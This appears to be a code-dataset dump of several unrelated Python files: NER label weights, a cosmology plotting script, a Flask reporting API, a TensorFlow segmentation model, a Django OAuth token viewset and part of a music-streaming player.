'StopWords': 0.01,\n \"Punctuation\": 0.01,\n \"Pronouns\": 0.01,\n \"NotFeatures\": 0.01,\n \"Adv\": 0.01,\n \"CompoundPhrase\": 0.01,\n \"ElmoLinkingRule\": 0.01,\n 'ExtractedPhrase': [0.95,0.95,0.95],\n 'ConsecutiveCapitals': [0.35,0.35,0.35],\n}\n\n\n# LAPTOP_SOURCE_WEIGHTS = {\n# 'CoreDictionary': 0.7,\n# 'OtherTerms': 0.1,\n# 'ReplaceThe': 0.01,\n# 'iStuff': 0.3,\n# 'Feelings': 0.01,\n# 'ProblemWithThe': 0.01,\n# 'External': 0.01,\n# 'StopWords': 0.01,\n# \"Punctuation\": 0.01,\n# \"Pronouns\": 0.01,\n# \"NotFeatures\": 0.01,\n# \"Adv\": 0.01,\n# \"CompoundPhrase\": 0.01,\n# \"ElmoLinkingRule\": 0.01,\n# 'ExtractedPhrase': 0.95,\n# 'ConsecutiveCapitals': 0.35,\n# }\n\nBC5CDR_LABELS = ['Chemical', 'Disease']\nBC5CDR_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in BC5CDR_LABELS for bi in \"BI\"]\nBC5CDR_INDICES = {label: i for i, label in enumerate(BC5CDR_BIO)}\n\nBC5CDR_SOURCE_NAMES = [\n 'DictCore-Chemical', 'DictCore-Chemical-Exact', 'DictCore-Disease', 'DictCore-Disease-Exact',\n 'Element, Ion, or Isotope', 'Organic Chemical', 'Antibiotic', 'Disease or Syndrome',\n 'BodyTerms', 'Acronyms', 'Damage', 'Disease',\n 'Disorder', 'Lesion', 'Syndrome', 'ChemicalSuffixes',\n 'CancerLike', 'DiseaseSuffixes', 'DiseasePrefixes', 'Induced',\n 'Vitamin', 'Acid', 'OtherPOS', 'StopWords',\n 'CommonOther', 'Punctuation', 'PossessivePhrase', 'HyphenatedPrefix',\n 'PostHyphen', 'ExtractedPhrase'\n]\n\nBC5CDR_SOURCES_TO_KEEP = [\n 'DictCore-Chemical', 'DictCore-Chemical-Exact', 'DictCore-Disease', 'DictCore-Disease-Exact',\n 'Organic Chemical', 'Disease or Syndrome', 'PostHyphen', 'ExtractedPhrase'\n]\n\nBC5CDR_SOURCE_PRIORS = {\n 'DictCore-Chemical': {'Chemical': (0.9, 0.9), 'Disease': (0.1, 0.1)},\n 'DictCore-Chemical-Exact': {'Chemical': (0.9, 0.5), 'Disease': (0.1, 0.1)},\n 'DictCore-Disease': {'Chemical': (0.1, 0.1), 'Disease': (0.9, 0.9)},\n 'DictCore-Disease-Exact': {'Chemical': (0.1, 0.1), 'Disease': (0.9, 0.5)},\n 'Element, Ion, or Isotope': {'Chemical': (0.9, 0.4), 'Disease': (0.1, 0.1)},\n 'Organic Chemical': {'Chemical': (0.9, 0.9), 'Disease': (0.1, 0.1)},\n 'Antibiotic': {'Chemical': (0.9, 0.4), 'Disease': (0.1, 0.1)},\n 'Disease or Syndrome': {'Chemical': (0.1, 0.1), 'Disease': (0.9, 0.7)},\n 'BodyTerms': {'Chemical': (0.1, 0.1), 'Disease': (0.7, 0.3)},\n 'Acronyms': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Damage': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Disease': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Disorder': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Lesion': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Syndrome': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'ChemicalSuffixes': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'CancerLike': {'Chemical': (0.1, 0.1), 'Disease': (0.7, 0.3)},\n 'DiseaseSuffixes': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'DiseasePrefixes': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Induced': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Vitamin': {'Chemical': (0.9, 0.3), 'Disease': (0.1, 0.1)},\n 'Acid': {'Chemical': (0.9, 0.3), 'Disease': (0.1, 0.1)},\n 'OtherPOS': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'StopWords': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'CommonOther': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Punctuation': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'PossessivePhrase': {'Chemical': (0.2, 0.2), 'Disease': (0.2, 0.2)},\n 'HyphenatedPrefix': {'Chemical': (0.2, 0.2), 'Disease': (0.2, 0.2)},\n 'PostHyphen': {'Chemical': (0.8, 0.3), 'Disease': (0.8, 0.3)},\n 'ExtractedPhrase': {'Chemical': (0.8, 0.3), 'Disease': (0.8, 0.3)},\n}\n\nBC5CDR_SOURCE_WEIGHTS = {\n 'DictCore-Chemical':0.9,\n 'DictCore-Chemical-Exact':0.85,\n 'DictCore-Disease':0.8,\n 'DictCore-Disease-Exact':0.8,\n 'Element, Ion, or Isotope':0.01,\n 'Organic Chemical':0.9,\n 'Antibiotic':0.01,\n 'Disease or Syndrome':0.75,\n 'BodyTerms':0.01,\n 'Acronyms':0.01,\n 'Damage':0.01,\n 'Disease':0.01,\n 'Disorder':0.01,\n 'Lesion':0.01,\n 'Syndrome':0.01,\n 'ChemicalSuffixes':0.01,\n 'CancerLike':0.01,\n 'DiseaseSuffixes':0.01,\n 'DiseasePrefixes':0.01,\n 'Induced':0.01,\n 'Vitamin':0.01,\n 'Acid':0.01,\n 'OtherPOS':0.01,\n 'StopWords':0.01,\n 'CommonOther':0.01,\n 'Punctuation':0.01,\n 'PossessivePhrase':0.01,\n 'HyphenatedPrefix':0.01,\n 'PostHyphen':0.85,\n 'ExtractedPhrase':0.85\n}","sub_path":"Src/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":21922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532872851","text":"#!/usr/bin/env python3\n#\n# Plots the power spectra and Fourier-space biases for the HI.\n#\nimport warnings\nfrom mpi4py import MPI\nrank = MPI.COMM_WORLD.rank\n#warnings.filterwarnings(\"ignore\") \nif rank!=0: warnings.filterwarnings(\"ignore\")\n\n\nimport numpy as np\nimport os, sys\nimport matplotlib.pyplot as plt\nfrom pmesh.pm import ParticleMesh\nfrom scipy.interpolate import InterpolatedUnivariateSpline as ius\nfrom nbodykit.lab import BigFileMesh, BigFileCatalog, FFTPower\nfrom nbodykit.cosmology import Planck15, EHPower, Cosmology\n\nsys.path.append('../utils/')\nsys.path.append('../recon/')\nsys.path.append('../recon/cosmo4d/')\nfrom lab import mapbias as mapp\nfrom lab import mapnoise as mapn\n\nfrom lab import report as rp\nfrom lab import dg\nfrom getbiasparams import getbias\nimport tools\n#\n\nfrom matplotlib import rc, rcParams, font_manager\nrcParams['font.family'] = 'serif'\nfsize = 12\nfontmanage = font_manager.FontProperties(family='serif', style='normal',\n size=fsize, weight='normal', stretch='normal')\nfont = {'family': fontmanage.get_family()[0],\n 'style': fontmanage.get_style(),\n 'weight': fontmanage.get_weight(),\n 'size': fontmanage.get_size(),\n }\n\n\n\n#\nimport argparse\nparser = argparse.ArgumentParser()\n#parser.add_argument('-m', '--model', help='model name to use')\nparser = argparse.ArgumentParser()\nparser.add_argument('-l', '--bs', help='boxsize', default=1024, type=float)\nparser.add_argument('-n', '--nmesh', help='nmesh', default=256, type=int)\n\nargs = parser.parse_args()\n\nfigpath = './figs/'\n\nbs, nc = args.bs, args.nmesh\npm = ParticleMesh(BoxSize=bs, Nmesh=[nc, nc, nc])\nrank = pm.comm.rank\n\n\n################\ndef make_rep_plot():\n \"\"\"Does the work of making the real-space xi(r) and b(r) figure.\"\"\"\n \n \n fig, axar = plt.subplots(1, 2, figsize=(9, 4), sharex=True)\n\n #fits\n linestyle=['-', '--']\n colors=['C%d'%i for i in range(7)]\n lww = 2\n \n wopt = 'opt'\n thopt = 'reas'\n lss = '-'\n for ia, aa in enumerate([0.2000]):\n zz = 1/aa-1\n for ik, kmin in enumerate([0.001, 0.01, 0.03, 0.05]):\n cc = colors[ik]\n angle = np.round(mapn.wedge(zz, att=wopt, angle=True), 0)\n #dpath = '/global/cscratch1/sd/chmodi/m3127/21cm_cleaning/recon/fastpm_%0.4f/wedge_kmin%0.2f_ang%0.1f/'%(aa, 0.03, angle)\n dpath = '/global/cscratch1/sd/chmodi/m3127/21cm_cleaning/recon/fastpm_%0.4f/wedge_kmin%0.2f_%s/'%(aa, kmin, wopt)\n dpath += 'L%04d-N%04d-R//thermal-%s-hex/ZA/opt_s999_h1massA_fourier_rsdpos/'%(bs, nc, thopt)\n datapp = mapp.Observable.load(dpath+'/datap')\n bpaths = [dpath+'%d-0.00//best-fit'%nc] + [dpath + '%d-0.00//%04d/fit_p/'%(nc,i) for i in range(100, 30, -20)]\n for path in bpaths:\n if os.path.isdir(path): \n break\n if rank == 0: print(path)\n bfit = mapp.Observable.load(path)\n rpfit = rp.evaluate1(bfit, datapp, field='mapp')[:-2]\n lbl = '$k_\\parallel = %.2f$'%kmin\n axar[0].plot(rpfit[0]['k'], rpfit[0]['power']/(rpfit[1]['power']*rpfit[2]['power'])**0.5, ls=lss, lw=lww, color=cc, label=lbl)\n axar[1].plot(rpfit[0]['k'], (rpfit[1]['power']/rpfit[2]['power'])**0.5, ls=lss, lw=lww, color=cc)\n\n\n ik += 1\n cc = colors[ik]\n dpath = '/global/cscratch1/sd/chmodi/m3127/21cm_cleaning/recon/fastpm_%0.4f/wedge_kmin%0.2f_ang%0.2f/'%(aa, 0, 0)\n dpath += 'L%04d-N%04d-R//thermal-%s-hex/ZA/opt_s999_h1massA_fourier_rsdpos/'%(bs, nc, thopt)\n datapp = mapp.Observable.load(dpath+'/datap')\n bpaths = [dpath+'%d-0.00//best-fit'%nc] + [dpath + '%d-0.00//%04d/fit_p/'%(nc,i) for i in range(100, 30, -20)]\n for path in bpaths:\n if os.path.isdir(path): \n break\n if rank == 0: print(path)\n bfit = mapp.Observable.load(path)\n rpfit = rp.evaluate1(bfit, datapp, field='mapp')[:-2]\n lbl = 'All modes'\n axar[0].plot(rpfit[0]['k'], rpfit[0]['power']/(rpfit[1]['power']*rpfit[2]['power'])**0.5, ls='--', lw=lww, color=cc, label=lbl)\n axar[1].plot(rpfit[0]['k'], (rpfit[1]['power']/rpfit[2]['power'])**0.5, ls='--', lw=lww, color=cc)\n\n axis = axar[0]\n axis.set_ylabel('$r_{cc}$', fontdict=font)\n axis.set_ylim(-0.05, 1.1)\n #for axis in axar[:, 1]: axis.set_ylabel(r'$\\sqrt{P_{\\rm mod}/P_{hh}}$', fontdict=font)\n axis = axar[1]\n axis.set_ylabel(r'$T_f$', fontdict=font)\n axis.set_ylim(-0.05, 2)\n for axis in axar[:]: axis.set_xlabel(r'$k\\quad [h\\,{\\rm Mpc}^{-1}]$', fontdict=font)\n for axis in axar.flatten():\n axis.axhline(1, color='k', ls=':')\n axis.set_xscale('log')\n axis.grid(which='both', lw=0.2, alpha=0.2, color='gray')\n axis.legend(prop=fontmanage)\n\n # Put on some more labels.\n for axis in axar.flatten():\n for tick in axis.xaxis.get_major_ticks():\n tick.label.set_fontproperties(fontmanage)\n for tick in axis.yaxis.get_major_ticks():\n tick.label.set_fontproperties(fontmanage)\n ##and finish\n plt.tight_layout(rect=[0, 0, 1, 0.95])\n if rank == 0: plt.savefig(figpath + '/kmin_L%04d-hex.pdf'%(bs))\n\n\n\n################\n\n\nif __name__==\"__main__\":\n make_rep_plot()\n #\n","sub_path":"code/plotting/plot_compare_kmin.py","file_name":"plot_compare_kmin.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200251679","text":"file = open(\"AER_urls.txt\")\nlist = []\n# newlist = []\nfor line in file:\n if 'www' in line:\n list.append(line.strip())\nfor item in list:\n with open('AER_papers_url.txt','a') as f:\n f.write(str(item)+'\\n')\n f.close()\nprint('Done')\n","sub_path":"Spider_AER_3_CheckEveryUrl.py","file_name":"Spider_AER_3_CheckEveryUrl.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"627595211","text":"from flask import Flask, Blueprint, jsonify, json, request\nfrom datetime import datetime\nfrom functools import wraps\nfrom app.models import User,USERS,FLAGS,Redflag\nfrom uuid import uuid4\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom .users import loggedinuser\n\nflags = Blueprint('flag', __name__)\n\n\n@flags.route(\"/api/v1/create_redflag\", methods=['POST'])\ndef create_redflag():\n\n try:\n if request.content_type != 'application/json':\n return jsonify({'Bad request': 'Content-type must be in json'}), 400\n\n request_data = request.get_json()\n\n if not request_data:\n return jsonify({\"Failed\": \"Request can't be empty\"}), 400\n\n global loggedinuser\n global FLAGS\n\n if len(loggedinuser) == 0:\n # unauthorized access\n return jsonify({'message': 'please login to create a flag'}), 401\n\n if 'type' not in request_data.keys():\n # bad request\n return jsonify({'message': 'Flag type is missing'}), 400\n else:\n type = request_data['type']\n\n if 'location' not in request_data.keys():\n # bad request\n return jsonify({'message': 'location is missing'}), 400\n else:\n location = request_data['location']\n\n if 'description' not in request_data.keys():\n # bad request\n return jsonify({'message': 'description is missing'}), 400\n if len(request_data['description']) < 20:\n # bad request\n return jsonify({'message': 'description should be well defined'}), 400\n\n else:\n description = request_data['description']\n \n data={\n \"flag_id\": str(uuid4()),\n \"type\":type,\n \"location\":location,\n \"description\":description\n }\n loggedinuser.append(data)\n return jsonify({'message': 'flag successfully created', 'flags':loggedinuser}), 201\n\n except KeyError as item:\n return jsonify({'message': str(item) + 'missing'}), 400\n return jsonify({'message': 'flag was not created, try again'}), 400\n\n# only viewed by admin through the admin accesselse:\n\n\n@flags.route('/api/v1/redflag', methods=['GET'])\ndef get():\n \"\"\"\"Function that returns all registered flags\"\"\"\n global loggedinuser\n\n if not loggedinuser:\n return jsonify({'message': 'No records found'}), 404 # not found\n else:\n return jsonify({'flags': loggedinuser}), 200\n\n\n@flags.route('/api/v1/redflag/', methods=['GET'])\ndef get_specific_flag(flag_id):\n \"\"\" function to retrieve a single flag by id\"\"\"\n global loggedinuser\n\n ","sub_path":"app/views/redflag.py","file_name":"redflag.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181314521","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\nimport numpy as np\nimport os\nimport re\nimport matplotlib.pyplot as plt\nimport sys\nfrom PIL import Image\nimport skimage.transform as ski\n\ndef rgb2gray(rgb):\n\n r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n\n return gray\n\ndef load_data(rootDir, maxNum = 2000, isResize = True):\n\tXtrain = []\n\tind = 0\n\tfor root, dirs, files in os.walk(rootDir):\n\t\tfor fileName in files:\n\t\t\t# print(filename)\n\t\t\tmatch = re.search(r'.*.jpg', fileName)\n\t\t\tif match:\n\t\t\t\timg = plt.imread(os.path.join(root, fileName))\n\t\t\t\tif len(np.shape(img)) > 2:\n\t\t\t\t\timg = rgb2gray(np.array(img))\n\t\t\t\timg = img / 255 #normalize\n\t\t\t\tif isResize:\n\t\t\t\t\timg = ski.resize(img, [64,64])\n\t\t\t\tXtrain.append(img)\n\t\t\t\tind += 1\n\t\t\t\tif ind >= maxNum:\n\t\t\t\t\treturn Xtrain\n\treturn Xtrain\n\ndef load_labels(rootDir, maxNum = 2000, isResize = True):\n\tytrain = []\n\tind = 0\n\tfor root, dirs, files in os.walk(rootDir):\n\t\tfor fileName in files:\n\t\t\t# print(filename)\n\t\t\tmatch = re.search(r'.*.jpg', fileName)\n\t\t\tif match:\n\t\t\t\timg = plt.imread(os.path.join(root, fileName))\n\t\t\t\timg = img/255 # normalize\n\t\t\t\tif isResize:\n\t\t\t\t\timg = ski.resize(img, [64,64])\n\t\t\t\tclassImg = np.zeros(np.shape(img))\n\t\t\t\tclassImg[img >= 0.5] = 1 # binary image\n\t\t\t\tytrain.append(classImg)\n\t\t\t\tind += 1\n\t\t\t\tif ind >= maxNum:\n\t\t\t\t\treturn ytrain\n\treturn ytrain\n\nprint('start load data ')\ndata = load_data(os.path.realpath(__file__ + \"/../\" + 'toy_segmentaion_data/data'))\nprint(np.shape(data))\n\nlabel = load_labels(os.path.realpath(__file__ + \"/../\" + 'toy_segmentaion_data/labels'))\nprint(np.shape(label))\nprint('end load data ')\n\ntrain_num = 1000\nval_num = 1500\ntest_num = 500\n\ntrain_dataset = data[:train_num]\ntrain_labels = label[:train_num]\nvalid_dataset = data[train_num:val_num]\nvalid_labels = label[train_num:val_num]\ntest_dataset = data[val_num:]\ntest_labels = label[val_num:]\n\nprint('Training set', np.shape(train_dataset), np.shape(train_labels))\nprint('Validation set', np.shape(valid_dataset), np.shape(valid_labels))\nprint('Test set', np.shape(test_dataset), np.shape(test_labels))\n\nplt.imshow(data[0], cmap='gray')\nplt.show()\nplt.imshow(label[0], cmap='gray')\nplt.show()\n\n\nimage_size = 64\nnum_labels = 1\nnum_channels = 1 # grayscale\n\ndef accuracy(predictions, labels):\n\tpredict_matrix = np.zeros(np.size(predictions))\n\tpredict_matrix[predictions > np.mean(predictions)] = 1\n\ttmp = np.equal(np.argmax(predictions, 3), np.argmax(labels, 3))\n\treturn np.mean(tmp)\n\t# return (100.0 * np.sum(np.argmax(predictions, 3) == np.argmax(labels, 3))\n # / image_size*image_size)\n\n\nbatch_size = 32\nkernel_size = 7\ndepth = 32\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n X = tf.placeholder(dtype=tf.float32,shape=[batch_size, image_size, image_size, num_channels])\n y = tf.placeholder(dtype=tf.float32, shape=[batch_size, image_size, image_size, num_labels])\n\n train_dataset = np.reshape(train_dataset, [-1, image_size, image_size, num_channels]).astype(np.float32)\n train_labels = np.reshape(train_labels, [-1, image_size, image_size, num_labels]).astype(np.float32)\n valid_labels = np.reshape(valid_labels, [-1, image_size, image_size, num_labels]).astype(np.float32)\n test_labels = np.reshape(test_labels, [-1, image_size, image_size, num_labels]).astype(np.float32)\n\n valid_dataset = np.reshape(valid_dataset, [-1, image_size, image_size, num_channels]).astype(np.float32)\n test_dataset = np.reshape(test_dataset, [-1, image_size, image_size, num_channels]).astype(np.float32)\n\n tf_valid_dataset = tf.constant(valid_dataset,dtype=tf.float32)\n tf_test_dataset = tf.constant(test_dataset,dtype=tf.float32)\n\n # Variables:\n # Different dimensions for the max_pooling ....\n\n W1 = tf.Variable(tf.truncated_normal(\n [kernel_size, kernel_size, num_channels, depth], stddev=0.1, name='W1'))\n b1 = tf.Variable(tf.zeros([depth]), name='b1')\n\n W2 = tf.Variable(tf.truncated_normal(\n [kernel_size, kernel_size, depth, depth*2], stddev=0.1), name='W2')\n b2 = tf.Variable(tf.constant(1.0, shape=[depth*2]), name='b2')\n\n W3 = tf.Variable(tf.truncated_normal(\n\t [2, 2, depth, depth * 2], stddev=0.1),name='W3',dtype=tf.float32)\n b3 = tf.Variable(tf.constant(1.0, shape=[depth]),name='b3',dtype=tf.float32)\n\n W4 = tf.Variable(tf.truncated_normal(\n\t [2, 2, depth, depth], stddev=0.1), name='W3',dtype=tf.float32)\n b4 = tf.Variable(tf.constant(1.0, shape=[depth]), name='b4',dtype=tf.float32)\n\n W5 = tf.Variable(tf.truncated_normal(\n\t [1, 1, depth, num_labels], stddev=0.1), name='W5',dtype=tf.float32)\n b5 = tf.Variable(tf.constant(1.0, shape=[num_labels]), name='b5',dtype=tf.float32)\n\n # Model.\n def model(data):\n ''''\n Model:\n conv-relu-max_pool(2x2)-conv-relu-max_pool(2x2)-relu-drop_out-FC\n Accuracy of 93%\n '''\n conv_1 = tf.nn.conv2d(data, W1, [1, 1, 1, 1], padding='SAME') # shape [batch_size, image_size, image_size, depth]\n relu_1 = tf.nn.relu(conv_1 + b1)\n max_pool_1 = tf.nn.max_pool(relu_1, [1,2,2,1], [1,2,2,1], padding='SAME') # shape [batch_size, image_size/2, image_size/2, depth]\n\n conv_2 = tf.nn.conv2d(max_pool_1, W2, [1, 1, 1, 1], padding='SAME')\n relu_2 = tf.nn.relu(conv_2 + b2)\n max_pool_2 = tf.nn.max_pool(relu_2, [1,2,2,1], [1,2,2,1], padding='SAME') # shape [batch_size, image_size/4, image_size/4, depth*2]\n\n # upsample\n # x_shape = tf.shape(x)\n # output_shape = tf.stack([x_shape[0], x_shape[1] * 2, x_shape[2] * 2, x_shape[3] // 2])\n max_pool_2_shape = max_pool_2.get_shape().as_list()\n out_shape = tf.stack([max_pool_2_shape[0], max_pool_2_shape[1]*2, max_pool_2_shape[2]*2, max_pool_2_shape[3]//2])\n # [batch_size, image_size//2, image_size//2, depth]\n deconv_1 = tf.nn.conv2d_transpose(value=max_pool_2,filter=W3, output_shape=out_shape, strides=[1,2,2,1])\n relu_3 = tf.nn.relu(deconv_1 + b3)\n\n relu_3_shape = relu_3.get_shape().as_list()\n out_shape = tf.stack([relu_3_shape[0], relu_3_shape[1] * 2, relu_3_shape[2] * 2, relu_3_shape[3]])\n # [batch_size, image_size, image_size, num_labels]\n deconv_2=tf.nn.conv2d_transpose(value=relu_3,filter=W4, output_shape=out_shape ,strides=[1,2,2,1]) # output size [batch_size, image_size, image_size, num_labels]\n relu_4 = tf.nn.relu(deconv_2 + b4)\n\n return tf.nn.relu(tf.nn.conv2d(relu_4, W5, [1, 1, 1, 1], padding='SAME') + b5)\n\n\n# Train\n logits = model(X)\n loss_train = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=logits))\n\n optimizer = tf.train.GradientDescentOptimizer(0.1).minimize(loss_train)\n\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(model(tf_valid_dataset))\n test_prediction = tf.nn.softmax(model(tf_test_dataset))\n\n num_steps = 300\n\n with tf.Session(graph=graph) as session:\n tf.global_variables_initializer().run()\n print('Initialized')\n for step in range(num_steps):\n ind = np.random.randint(0, train_num-1, batch_size)\n batch_data = train_dataset[ind, :, :]\n batch_labels = train_labels[ind, :]\n feed_dict = {X: batch_data, y: batch_labels}\n _, l, predictions = session.run(\n [optimizer, loss_train, train_prediction], feed_dict=feed_dict)\n if (step % 50 == 0):\n print('Minibatch loss at step %d: %f' % (step, l))\n print('Minibatch accuracy: %.3f%%' % accuracy(predictions, batch_labels))\n prediction = valid_prediction.eval()\n print('Validation accuracy: %.3f%%' % accuracy(prediction, valid_labels))\n f, (ax1, ax2) = plt.subplots(2)\n ax1.imshow(valid_labels[0][:, :, 0], cmap='gray')\n ax1.set_title('ground truth:')\n tmp0 = prediction[0]\n res = np.zeros(np.shape(tmp0))\n res[tmp0 >= np.mean(tmp0)] = 1\n ax2.imshow(res, cmap='gray')\n ax2.set_title('prediction: class 0: figure')\n plt.show()\n\n print('Test accuracy: %.3f%%' % accuracy(test_prediction.eval(), test_labels))\n\n\n\n","sub_path":"ProjectSrc/ExternalModules/toy_data_segmentaion_model_2.py","file_name":"toy_data_segmentaion_model_2.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556026285","text":"from datetime import timedelta\nfrom django.utils import timezone\nfrom rest_framework import viewsets, permissions, mixins\n\nimport requests\n\nfrom oauth.models import OauthClient, Token\nfrom oauth.serializers import OauthClientSerializer, TokenSerializer\nfrom oauth.permissions import TokenPermission\nfrom common import responses\n\n# Create your views here.\n\n\nclass OauthClientViewSet(viewsets.ReadOnlyModelViewSet):\n lookup_field = 'name'\n queryset = OauthClient.objects.all()\n serializer_class = OauthClientSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n\nclass TokenViewSet(mixins.CreateModelMixin, mixins.ListModelMixin,\n mixins.RetrieveModelMixin, mixins.DestroyModelMixin,\n viewsets.GenericViewSet):\n queryset = Token.objects.all()\n serializer_class = TokenSerializer\n permission_classes = (TokenPermission,)\n\n APP_USER_AGENT = 'kass test app by /u/swampfire100'\n HEADERS = {'User-agent': APP_USER_AGENT}\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n Create a token using the given code and associates it with the given oauth_client and user\n\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n user = request.user\n try:\n code = request.data.get('code')\n oauth_client = request.data.get('oauth_client')\n\n # actually get the oauth_client object\n # Can take either name or id\n try:\n oauth_client = OauthClient.objects.get(id=int(oauth_client))\n except ValueError:\n oauth_client = OauthClient.objects.get(name=oauth_client)\n\n if None in (code, oauth_client):\n raise ValueError(request.data)\n\n payload = {\n 'grant_type': 'authorization_code', # OAuth 2.0 specification\n 'code': code,\n 'redirect_uri': oauth_client.redirect_uri\n }\n\n auth = None\n\n if oauth_client.authorize_using_header:\n auth = (oauth_client.client_id, oauth_client.client_secret)\n\n else:\n payload['client_id'] = oauth_client.client_id\n payload['client_secret'] = oauth_client.client_secret\n\n r = requests.post(oauth_client.token_url, payload, auth=auth, headers=self.HEADERS)\n\n if r.status_code == 200:\n # Painful debugging note: Yea... it returns a tuple.\n token, created = Token.objects.update_or_create(user=user, oauth_client=oauth_client,\n defaults=r.json())\n serializer = TokenSerializer(token)\n\n return responses.data_response(serializer.data)\n else:\n raise ValueError('failed get token request')\n\n except OauthClient.DoesNotExist:\n return responses.error_response('Invalid oauth_client_id.')\n except ValueError:\n return responses.INVALID_DATA_RESPONSE\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Lists all the tokens owned by the user\n\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n\n tokens = Token.objects.filter(user=request.user)\n self._replace_expired_tokens(tokens)\n serializer = TokenSerializer(tokens, many=True)\n return responses.data_response(serializer.data)\n\n def retrieve(self, request, *args, **kwargs):\n token = self.get_object()\n try:\n self._replace_expired_token(token)\n serializer = self.get_serializer(token)\n return responses.data_response(serializer.data)\n except ValueError as e:\n token.delete()\n return responses.error_response(str(e))\n\n def destroy(self, request, *args, **kwargs):\n token = self.get_object()\n oauth_client = token.oauth_client\n access_token = token.access_token\n token.delete()\n\n # Process is not uniform across different companies\n if oauth_client.name == 'reddit':\n auth = (oauth_client.client_id, oauth_client.client_secret)\n data = {'token': access_token}\n\n r = requests.post(oauth_client.revoke_url, data, auth=auth, headers=self.HEADERS)\n if r.status_code < 300:\n return responses.success_response('Token deleted.')\n else:\n return responses.error_response('Revoke token error.')\n\n def _replace_expired_tokens(self, tokens):\n \"\"\"\n Loop through each token and refresh it if necessary.\n\n :param tokens:\n :return:\n \"\"\"\n\n for token in tokens:\n try:\n self._replace_expired_token(token)\n except ValueError:\n # get rid of the token if it was unable to be refreshed\n token.delete()\n\n def _replace_expired_token(self, token):\n if token.is_expired():\n oauth_client = token.oauth_client\n # get new token\n payload = {\n 'refresh_token': token.refresh_token,\n 'grant_type': 'refresh_token' # OAuth 2.0 specification\n }\n\n # might need to configure steps for different companies\n auth = None\n if oauth_client.authorize_using_header:\n auth = (oauth_client.client_id, oauth_client.client_secret)\n\n else:\n payload['client_id'] = oauth_client.client_id\n payload['client_secret'] = oauth_client.client_secret\n\n r = requests.post(oauth_client.token_url, payload, auth=auth, headers=self.HEADERS)\n\n if r.status_code == 200:\n data = r.json()\n token.created = timezone.now()\n token.access_token = data.get('access_token')\n token.expires_in = data.get('expires_in')\n token.token_type = data.get('token_type')\n token.scope = data.get('scope', None)\n token.save()\n else:\n raise ValueError('Failed to refresh token.')\n","sub_path":"oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"105643927","text":"#!/usr/bin/env python2\nimport os\nimport gi\nimport sys\nimport glib\nimport thread\nimport random\nimport readline\nimport gmusicapi\nimport unicodedata\nfrom time import sleep\nfrom getpass import getpass\n\ngi.require_version('Gst', '1.0')\nfrom gi.repository import GObject, Gst\n\nGObject.threads_init()\nglib.threads_init()\nGst.init(None)\n\nMESSAGE_TIMEOUT = 3 # seconds\n\ndef strip_accents(s):\n nrm = ''.join(c for c in unicodedata.normalize('NFD', s) \n if unicodedata.category(c) != 'Mn')\n return nrm\n\nclass GetchUnix:\n \"\"\"Implements getch for unix systems. Thanks StackOverflow.\"\"\"\n def __init__(self):\n import tty, sys\n\n def __call__(self):\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\nclass StreamPlayer:\n \"\"\"Handles the control of playbin2 from the Gst library.\"\"\"\n def __init__(self, main_player):\n self._player = Gst.ElementFactory.make(\"playbin\") # \"player\" or None\n # self.playing = False\n # self.stop()\n\n def change_song(self, URI):\n self.stop()\n self._player.set_property('uri', URI)\n self.play()\n\n def play(self):\n self.playing = True\n self._player.set_state(Gst.State.PLAYING)\n\n def pause(self):\n self.playing = False\n self._player.set_state(Gst.State.PAUSED)\n\n def toggle(self):\n if self.playing:\n self.pause()\n else:\n self.play()\n\n def stop(self):\n self.playing = False\n self._player.set_state(Gst.State.NULL)\n\n\ndef notify(txt):\n print(txt)\n\n\ndef term_width():\n import os\n rows, columns = os.popen('stty size', 'r').read().split()\n return columns\n\n\ndef get_device_id(username, password):\n \"\"\"Handles retrieving an android device ID to enable 